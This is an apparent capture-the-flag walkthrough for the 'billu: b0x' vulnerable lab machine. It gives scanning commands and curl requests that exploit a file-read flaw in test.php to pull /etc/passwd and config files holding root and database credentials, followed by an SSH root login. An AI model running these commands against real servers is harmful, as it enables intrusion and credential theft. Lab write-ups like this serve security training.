billu: b0x
netdiscover -r x.x.x.0/24
nmap <IP of billu>
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
nmap -p 1-65535 -T4 -A -v <IP of billu>
nmap -p- -A <IP of billu>
nmap -T4 -A -v -p- <IP of billu>
nmap -sSV -n -Pn <IP of billu> -T5
nikto -h http://<IP of billu>
dirb http://<IP of billu>
Dirb
finds a couple interesting directories /add, /show and /test
We
also want to run a Dirb scan with big.txt for wordlist:
dirb http://<IP of billu> /usr/share/wordlists/dirb/big.txt
or
dirb http://<IP
of billu> /usr/share/dirb/wordlists/big.txt
or
dirb http://<IP of billu>
/opt/wordlists/SecLists/Discovery/Web_Content/big.txt
or
just
locate big.txt
From
these Dirb results we see there is a phpmyadmin in the /phpmy/
directory. http://<IP of billu>/phpmy/phpmyadmin
So,
naviagting to http://<IP of billu>/phpmy/ sends us to the
phpMyAdmin login page.
But,
root:<blank> doesn't work.
Navigating
to http://<IP of billu>/test gives us the error:
'file' parameter is empty. Please provide file path in 'file'
parameter
So,
from this output, we can determine that /test.php reads a parameter
called file and get read access of the server, so let's pass it using curl:
curl -X POST -F 'file=/etc/issue' http://<IP
of billu>/test.php
Ubuntu 12.04.5 LTS \n \l
Now,
let's try to extract the phpmyadmin's config file. We can use BurpSuite
or curl to change the HTTP method from GET to POST.
(Note:
for BurpSuite methods go here: https://scriptkidd1e.wordpress.com/billu-b0x-vulnhubs-vm-walkthrough/)
(Note:
We no longer really care about the phpmyadmin backend credentials if we
can exploit the SQLi.)
curl -X POST -F
'file=/var/www/phpmy/config.inc.php' http://<IP of billu>/test.php
Here,
we get the creds root:roottoor
We
can try these creds with SSH:
ssh root@<IP of billu>
or
ssh <IP of billu>
But
we get a WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! error
So:
ssh-keygen -f "/root/.ssh/known_hosts" -R <IP of
billu>
whoami
root
:))))))))~~~~~~~~~~~~~
Note:
These creds do not work on the phpmyadmin login, duh...
___________________________________________________________
To
go the PHPMY ADMIN route:
We can also extract the user list /etc/passwd/
file:
curl -X POST --data "file=/etc/passwd"
http://<IP of billu>/test.php
Let's
also extract index.php:
curl -X POST --data "file=index.php"
http://<IP of billu>/test.php
At
the top of this output we see the inclusion of two files, c.php and head.php.
Also, we see login authentication is using an auth table in the database:
$run='select * from auth where
pass=\''.$pass.'\' and uname=\''.$uname.'\'';
Now,
let's open the c.php file:
curl -X POST --data "file=c.php" http://<IP of
billu>/test.php
This
reveals the credentials of the phpmyadmin page:
$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
So
the creds to phphmyadmin are billu:b0x_billu
Go here to finish rooting this the
phpmyadmin way!:
https://scriptkidd1e.wordpress.com/billu-b0x-vulnhubs-vm-walkthrough/